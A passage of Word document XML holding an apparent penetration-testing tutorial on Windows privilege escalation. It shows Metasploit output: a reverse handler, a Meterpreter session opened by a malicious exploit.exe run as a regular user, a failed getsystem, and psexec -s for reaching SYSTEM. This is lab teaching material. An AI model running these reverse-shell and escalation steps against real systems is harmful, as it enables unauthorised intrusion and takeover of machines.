        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt go ahead and exit out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426A2CC" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; exit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\*\] Shutting down Meterpreter...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940402E" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50EAF6E8" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">\*\] Meterpreter session 2 closed.  Reason: User exit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(handler) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F0616" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Now instead of launching our malicious executable from the OSE service let’s execute exploit.exe, that we moved over earlier to our target windows machine, as a regular user. I saved my exploit.exe on the desktop. Before running exploit.exe as a regular user we need to go back to Linux and start our handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186951BC" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>(handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7167AD" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A30B2C" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\*\] Started reverse handler on 192.168.134.135:80 \[\*\] Starting the payload handler...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F08115" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Now on our windows target machine let’s run our exploit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294E443" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>c:\\Users\\homer\\Desktop&gt;exploit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505ABD0" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>c:\\Users\\homer\\Desktop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D43B8" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we run exploit.exe on our windows target machine you should get back a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompt back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BDF1C" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\*\] Sending stage (752128 bytes) to 192.168.134.134 \[\*\] Meterpreter session 3 opened (192.168.134.135:80 -&gt; 192.168.134.134:49175) at 2012-03-23 00:29:29 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEAF2FC" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C78A822" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Now let’s try the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>” command and see what happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6DA20" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C7AB2D3" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Here it just hangs and doesn’t do anything, after about a minute it will finally error out giving the following output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B2125" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>\[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">-\] Error running command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>: Rex::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>TimeoutError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operation timed out. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A34FC7" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command didn’t work. This is to be expected because the user (homer is our user) that executed our exploit.exe is a regular user and our windows box is up to date with all the latest patches. If we go back to our windows </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we’ll see the following error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3835C6" w14:textId="66051C4B" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D41C0EE" wp14:editId="31D57C0F">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1587893559" name="Rectangle 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2E97F" id="Rectangle 5" o:spid="_x0000_s1026" href="http://travisaltman.com/wp-content/ntvd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673B46A" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This error is generated because the kitrap0d exploit fails and the exploit fails because the windows box is up to date with all the latest patches. When you don’t have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the windows box is up to date there is only a handful of options to escalate your privileges and testing for weak permissions is one of those avenues. Going from regular user to a system user can be difficult if everything is properly locked down but going from an admin user to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>system user is not that big of a deal. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:instrText>HYPERLINK "http://technet.microsoft.com/en-us/sysinternals/bb897553"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> psexec.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is another powerful tool every </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> should have in his tool bag. Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an admin user one can easily become the system user with the “-s” option so if you wanted a command prompt with system level privileges all you would have to do is run the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD04EC" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>c:\\psexec.exe -s cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D12B757" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">After this you’ll be presented with a command prompt with system level privileges. I mention </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> just to show you how easy it is to become the system user as long as you’re an admin user. The “-s” option of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> would not work as a regular user only an admin user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721043C4" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">To wrap this all up I simply wanted to highlight one way of escalating your privilege on a windows device. This is simply one method to escalate privileges, there are many like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
